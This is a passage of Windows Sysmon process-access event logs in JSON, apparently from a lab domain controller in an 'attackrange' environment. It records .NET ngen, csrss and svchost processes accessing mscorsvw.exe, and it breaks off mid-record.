{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101E660B00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101E660B00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101E660B00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101E660B00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.148\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101E660B00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.148","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101E660B00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.164\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101A690B00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.164","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101A690B00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.164\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101A690B00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.164","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101A690B00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.179\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101A690B00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.179","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101A690B00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.367\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010DE6C0B00}\r\nTargetProcessId: 2064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.367","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010DE6C0B00}","TargetProcessId":"2064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.367\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010DE6C0B00}\r\nTargetProcessId: 2064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: 